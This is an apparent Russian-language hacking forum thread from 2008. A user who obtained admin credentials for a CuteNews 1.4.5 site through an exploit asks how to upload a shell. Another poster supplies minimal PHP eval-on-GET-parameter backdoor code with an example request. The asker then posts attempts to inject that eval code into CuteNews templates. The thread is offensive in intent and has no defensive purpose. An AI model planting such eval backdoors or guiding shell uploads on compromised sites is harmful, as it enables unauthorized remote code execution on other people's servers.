03.04.2008, 03:28
|
|
Участник форума
Регистрация: 26.02.2006
Сообщений: 209
Провел на форуме:
2418438
Репутация:
93
|
|
1, 0?
|
|
|
03.04.2008, 04:13
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 331
Провел на форуме:
1724067
Репутация:
806
|
|
Сообщение от ToniKapuchon
1, 0?
неа, 1,0,труе,фалсе, большими буквами, маленькими, ничего не пододит, поэтому и обратился. Может как-то можна обойти это. Например черезразные хеши переменных, может как-то они по другому пишутся. Тоесть по сути ТРУЕ и ФАЛСЕ где-то определены как константы, но кто-его знает...
|
|
|
|
03.04.2008, 04:26
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197
Репутация:
5
|
|
Всем участникам приветы!
хотел вот спросить ибо уже сломал се моск.... =(
по моему вопросу в одной из тем мне посоветовали "Eval'лить код или поставь форму на закачку шела". Ушел в статьи и на php.ru (прошла неделя - голова как воздушный шарик)
Тоесть как я понял в eval можно загнать пхп код - смысл етого я не пойму?
На примере cutenews 1.4.5 на котором через эксплойт дабыл логин пароль админа -
в теплейтах нельзя исполнлить пхп код, он его не воспринимает и не выводит (заметил что если вставить пхп код то после повторного просмотра долбаный кут ньюз удаляет из кода все введене переменые)
Вот как бы и сам вопрос: объяснити для чего нужен етот eval, как и пользоваться и если есть желание помочь опишите, как мне залить шел в cutenews 1.4.5 имея админские привелегии?
|
|
|
|
03.04.2008, 04:27
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
Провел на форуме:
16641028
Репутация:
2371
|
|
presidentua,
PHP код:
<?php
eval($_GET['xek']);
$str2='asdfasdf asdf';
if ($str1 == $str2) echo 1;
?>
Естественно это не безопасно
index.php?xek=$str1=true; |
|
|
|
03.04.2008, 04:52
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
Провел на форуме:
16641028
Репутация:
2371
|
|
6u4yxa, пример
PHP код:
<?php
eval($_GET['sekas']);
?>
Обратись к скрипту так: script.php?sekas=phpinfo(); |
|
|
|
03.04.2008, 05:13
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197
Репутация:
5
|
|
Сообщение от Isis
6u4yxa, пример
PHP код:
<?php
eval($_GET['sekas']);
?>
Обратись к скрипту так: script.php?sekas=phpinfo(); после того как занес ето в теплейт вылезло вот ето
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING
|
|
|
|
03.04.2008, 05:17
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
Провел на форуме:
16641028
Репутация:
2371
|
|
Я про скрипт говорил, а не про темплейт)
http://php.net/eval
|
|
|
|
03.04.2008, 05:33
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197
Репутация:
5
|
|
Сообщение от Isis
Я про скрипт говорил, а не про темплейт)
http://php.net/eval
про евал уже все что можно прочитал но не могу все равно понять зачем он нужен...
А на счет теплейта как реализовать php код там?
_____________________
попробовал тот код из примера работает =) выводит phpinfo(); но яж могу и без всякого eval его вывести.
_____________________
прошло ещё 10 мин...
вставил в темплейт вот так:
<?
eval($GET['sekas']);
?>
вылезла ошибка...
посидел, подумал..
вставил в темплейт вот так:
<?
eval(\"$GET['sekas']\"\);
?>
смотрю ошибки нету... (думаю получилось)...
пробую...
http://localhost/cute/show_news.php?sekas=phpinfo();
........(мат) просто отобразил последние новости без phpinfo(); - в чем загвостка?
Последний раз редактировалось 6u4yxa; 03.04.2008 в 06:00..
|
|
|
|
03.04.2008, 08:53
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
Сообщение от 6u4yxa
про евал уже все что можно прочитал но не могу все равно понять зачем он нужен...
А на счет теплейта как реализовать php код там?
_____________________
попробовал тот код из примера работает =) выводит phpinfo(); но яж могу и без всякого eval его вывести.
_____________________
прошло ещё 10 мин...
вставил в темплейт вот так:
<?
eval($GET['sekas']);
?>
вылезла ошибка...
посидел, подумал..
вставил в темплейт вот так:
<?
eval(\"$GET['sekas']\"\);
?>
смотрю ошибки нету... (думаю получилось)...
пробую...
http://localhost/cute/show_news.php?sekas=phpinfo();
........(мат) просто отобразил последние новости без phpinfo(); - в чем загвостка?
тема поднималась на предыдущих страницах смотри внимательнее
|
|
|
|
03.04.2008, 13:18
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197
Репутация:
5
|
|
Сообщение от heks
тема поднималась на предыдущих страницах смотри внимательнее
плиз тыкни носом я просто с оченннннь отдаленого города и у нас инет просто ДЕБИЛ в плане тормаза и траф дороговатый =) да и страниц тут уже 260 =)
____________
дошел до 245 не че не нашел то, что мне помогло бы =(((
Последний раз редактировалось 6u4yxa; 03.04.2008 в 13:31..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
